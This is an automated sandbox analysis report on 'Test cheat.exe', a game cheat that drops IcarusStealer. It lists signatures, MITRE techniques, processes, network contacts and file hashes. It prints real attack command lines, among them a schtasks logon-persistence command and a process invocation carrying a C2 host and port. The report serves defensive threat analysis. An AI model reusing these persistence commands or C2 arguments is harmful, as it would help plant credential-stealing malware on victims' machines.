Malware Analysis Report

2024-08-06 08:22

Sample ID 240309-grx61add39
Target Test cheat.exe
SHA256 13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Tags
icarusstealer persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

Threat Level: Known bad

The file Test cheat.exe was found to be: Known bad.

Malicious Activity Summary

icarusstealer persistence stealer

IcarusStealer

Modifies Installed Components in the registry

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in System32 directory

Unsigned PE

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Scheduled Task/Job
T1053
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Scheduled Task/Job
T1053
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-03-09 06:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-09 06:02

Reported

2024-03-09 06:05

Platform

win7-20240215-en

Max time kernel

1s

Max time network

140s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2972 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2972 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2972 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\Client.exe
PID 2972 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2972 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2972 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2972 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\Test cheat.exe C:\Users\Admin\AppData\Local\Temp\switched.exe
PID 2588 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2588 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2588 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2588 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
PID 2588 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2588 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2588 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2588 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\switched.exe C:\Users\Admin\AppData\Local\Temp\tesetey.exe
PID 2528 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2684 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2684 wrote to memory of 2408 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2684 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2684 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2684 wrote to memory of 2416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2684 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2684 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2684 wrote to memory of 2436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2696 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2696 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2696 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2696 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Test cheat.exe

"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\AppData\Local\Temp\switched.exe

"C:\Users\Admin\AppData\Local\Temp\switched.exe"

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\htg5kqoj\htg5kqoj.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18FD.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4919142DE5F54A828914172CA81FC820.TMP"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp5D0E.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 operating-noble.gl.at.ply.gg udp
US 147.185.221.18:52033 operating-noble.gl.at.ply.gg tcp
N/A 127.0.0.1:49221 tcp
N/A 127.0.0.1:49223 tcp

Files

\Users\Admin\AppData\Local\Temp\Client.exe

MD5 ff219c8c219807ee57e76c79a1c41d07
SHA1 9c61f0def535267fbdc388c0dd198fb19ccf07b8
SHA256 6916849fca5276d5d9fb61ea504d1fd1c760d31ea7d8f59944623e2570b769ef
SHA512 dba3259b17d27814ebf2a598947348276375a560c5137310a6c38da882f47f2d1a2e83ed51491296dcf8bc6d4d9d666331271b01b93fc456002dea6876295b31

C:\Users\Admin\AppData\Local\Temp\Client.exe

MD5 0646ae84aeb7b80c11c24b1d9f4ed5cc
SHA1 04f028c76eaa33ff79da32671b54f7f9f2a63ad3
SHA256 adf0a7c0d1da142a1c80d7b53e2acfcdf91d08515524afe21bebd0ef2fc31606
SHA512 5453773c590fa6699989e62b836c555f548dc25681ad51ed5f81143aa50a52226502e76bd77990a506daafd8ad5108b9879e7e00e97696e71053a20d21d16dce

C:\Users\Admin\AppData\Local\Temp\switched.exe

MD5 b9bbe31d276de5c3d05352d070ae4244
SHA1 5e1bb67b01c579b4e0ad5a7475ceb657201c27ec
SHA256 a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d
SHA512 0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

\Users\Admin\AppData\Local\Temp\switched.exe

MD5 fd296e0f1ec266f3a2eccdb818cf3b67
SHA1 6ad7ec477fbfabe5588ecfcdca1394a881025f17
SHA256 97b338ed33b007a28e3b55115b38e40c42b0b87a4e1c95624fd7dbe6fe81504f
SHA512 e924f8ac5fa9666917ad9d2ca6d2977dcd270ef82af49508d71be5c2a6085b2cef550375dd7d355a5925cfcd979085e85a0c53d42d4a32f1d0e1e1d679294ed3

memory/860-15-0x00000000009D0000-0x0000000001010000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 3e359df762ce2cca4fa21b0aa438b532
SHA1 cd3a11ed9cfb6c4a1f6b29ffb4d4855372c5378e
SHA256 c72a672ead28482da2e06879b26a6a018a054f0e52f9b015adac64380d6e30c5
SHA512 a636c71adb2865d4f62fecd9942f8792a22dc623930f6d1db742be48607d44a30ff445f92708a026cc7820f93d4abd6f65dc5187c17a3ac39c9909ba050e8364

\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 4b059d6e46947e55c5caa4795901ec45
SHA1 9e7ae8078f4dc9ce55a5ba02e58e66a5097d07af
SHA256 f7a1b5fb73aad22bb00c9cbd50ee33b2047ee2401dd2f0da726ff1630939460d
SHA512 196b40af7daef723abaf0def1b5035e346a3385db6d068ffd78af700caf71414283d095c652018de859c3ea54c1387901fc6fee39cf819b8f0e5d28bd5bce11b

C:\Users\Admin\AppData\Local\Temp\tesetey.exe

MD5 0f0838bc6642dd6bc603368e50b4aba3
SHA1 932bd4d1c11996bf8ac3ac74a94b266e96d44c36
SHA256 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9
SHA512 a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe

MD5 82f570df1e57d61d05b97b1030e03351
SHA1 614ef7fb55963267ad4177e366e135e074473694
SHA256 0599cca5237cd7937b10961473e3789f8ae19b0fabf37758140d0492cc210a01
SHA512 0c5251723848d8acba6b5d727e4537f832c4e75cab842d21bde7b5eaec20418151b58ce7dd3caf590e6cd6f706644db1735c7527db43ea4853b7ea68c4b10a6c

memory/2696-27-0x0000000001220000-0x00000000012A2000-memory.dmp

memory/2528-29-0x000000013F080000-0x000000013F4BC000-memory.dmp

memory/860-26-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/2696-30-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/2696-31-0x0000000000B20000-0x0000000000B60000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\htg5kqoj\htg5kqoj.cmdline

MD5 26dfae6a4002d52d0e20eb10b67f490d
SHA1 35d8accf77d2712749aec0772226638215416c06
SHA256 982181ba5cbfc04e3345e4bd4bd7efaa1b5e558ea5c6e63edb3d1d03aa3435a9
SHA512 c8f4192a4ab98519fdc104d2bbae66e1540598ca32fbe01fc30be9e8e691cfc430858ea3517e9a344f7feecdbc7c1e2bcfb0d7a73efe35d9fda29795532a2a8e

\??\c:\Users\Admin\AppData\Local\Temp\htg5kqoj\htg5kqoj.0.cs

MD5 14846c9faaef9299a1bf17730f20e4e6
SHA1 8083da995cfaa0e8e469780e32fcff1747850eb6
SHA256 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b
SHA512 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

C:\Users\Admin\AppData\Local\Temp\RES18FD.tmp

MD5 af2b63912826bfae550e175aa395886f
SHA1 d3f68393e1df5195d58c2a3e1699e84f933ccfbc
SHA256 12f7660500ccd24a2cb7f28eca3a12504a8f79dc194873e63085a527990ae207
SHA512 619a963e9f042f03a932a9ebd7c9ded852139e32b29e65e2bf2237ad98aa7d95b72707096d3469411b1c63619133d432b5008a99fc6d2d0e35520ae1ab10551a

\??\c:\Users\Admin\AppData\Local\Temp\CSC4919142DE5F54A828914172CA81FC820.TMP

MD5 8bbf0aca651a891e81c9323a8af372ee
SHA1 c6ff718e14da6eb73d2733b41c0a95df9a23fc45
SHA256 9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2
SHA512 e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

memory/2728-44-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2728-46-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

MD5 165960102d503c3f05942011a097bc59
SHA1 fc96c66974390dfcabfaaaa75b11526193a0c431
SHA256 5a9b79c39427f8c030b0af0dacdddd94283b09e037b0070cf438659d5e029b9f
SHA512 fd397852de154079beb1fb8abc50574d8485deb0515672fe1c1985e354b62a30850682eeb4e7f37501adc9398950216f83d5a37f9bd03dc23fc77acb1a2bbcd5

memory/1520-52-0x0000000000D60000-0x0000000000D68000-memory.dmp

memory/2528-53-0x000000013F080000-0x000000013F4BC000-memory.dmp

memory/1520-54-0x000007FEF54B0000-0x000007FEF5E9C000-memory.dmp

memory/1520-56-0x000000001AEE0000-0x000000001AF60000-memory.dmp

memory/860-55-0x0000000005210000-0x0000000005250000-memory.dmp

memory/2712-58-0x0000000004390000-0x0000000004391000-memory.dmp

memory/860-68-0x0000000074430000-0x0000000074B1E000-memory.dmp

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 8e2e864d1a14aa04d89af412d939a35a
SHA1 efd5eb845b6344ce3f83555b2e65ad637dc54968
SHA256 958cb8589a2270621595a4aeaa1c25b49b5c5b3d6c58d49f9e71ee4cd7c5a086
SHA512 63f800e4df231e2aca790e689273b0ec77f54401bf14aeb97f6ea2ccee595a377b846ae117b42ba9429f33ef6a45dcd66cedd63adf84a032ae6e88329baf9092

C:\Users\Admin\AppData\Local\Temp\tmp5D0E.tmp.bat

MD5 9d47c063be76745783c02aa14b985c9e
SHA1 a4d43a60023d5f58e980211c3b23fefe50d9d5bb
SHA256 577bda05d04bed71f163a820654a6a1aa54da3a738731ad234382f29084a605c
SHA512 c804b48c50878fae4079b67203d9f91ed8f25435d7246a1ce34b85a462eba551d8029984d937cc6eefac419d5b4540ef233a60710b680d7c972cb524c9cd7979

\Windows\System32\catroot\$SXR\$SXR.exe

MD5 69766462ca23c47016ea68ca62b33a75
SHA1 fe44d459445b082804aa33bac32b5ad710f84e1a
SHA256 d02d7a0e8fa78c73e694d0cc6b863e313387124ebf7fe120402d882aa8cdd449
SHA512 7b721a90c026d120838f2e8a855280054b34e591195c8d7293f2a82f16bf5c2cb3d50dbb41c599e1a36a58e04d400472e0840fdaa80b108b149b1e1ed630b469

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 f8bfc68aa29b9426128534a578dd9e96
SHA1 9486bb8a8212226d0c56256274162152e7ba2e23
SHA256 815698a13c8f703ccd35310cc486f43d0bd08b951e964c2c37235b0ded884e02
SHA512 15561cb3e45223fd3275bbdff1d65cb09ad81ec13f82bcb15e4b03ede6f6f03c990c6522a291ecc11d12d04463ab5e3c8a771ffc48465f258f84499b467644b3

memory/1120-73-0x00000000010C0000-0x0000000001700000-memory.dmp

C:\Windows\System32\catroot\$SXR\$SXR.exe

MD5 67ce0d3ab8aa4af05dc0cd69e63a867d
SHA1 59c53fb1b2fcd34d8a238f27db4cfb8c65c8f8b6
SHA256 b35d6f2d1d5bb3ece0ed1a075361f0e2203f296e594a7c240c14acb24776c2cf
SHA512 e903ce8ddc1909b99dafbfe43af1238c2ba40b373ac21643cc2929069106ac8a6fb232708323483002500f6b507545e9c15f8c9804901e1cb5853525d4ab0eac

memory/1120-74-0x0000000074430000-0x0000000074B1E000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

C:\Users\Admin\AppData\Local\Temp\Cab92DF.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

memory/2696-93-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/2696-94-0x0000000000B20000-0x0000000000B60000-memory.dmp

memory/1520-95-0x000007FEF54B0000-0x000007FEF5E9C000-memory.dmp

memory/2712-99-0x0000000004390000-0x0000000004391000-memory.dmp

memory/1120-101-0x0000000074430000-0x0000000074B1E000-memory.dmp

memory/2712-102-0x0000000003FA0000-0x0000000003FB0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-09 06:02

Reported

2024-03-09 06:05

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"

Signatures

IcarusStealer

stealer icarusstealer

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Test cheat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\switched.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\$SXR.exe C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
File opened for modification C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
File created C:\Windows\System32\CatRoot\$SXR\Read.txt C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3216 set thread context of 1720 N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
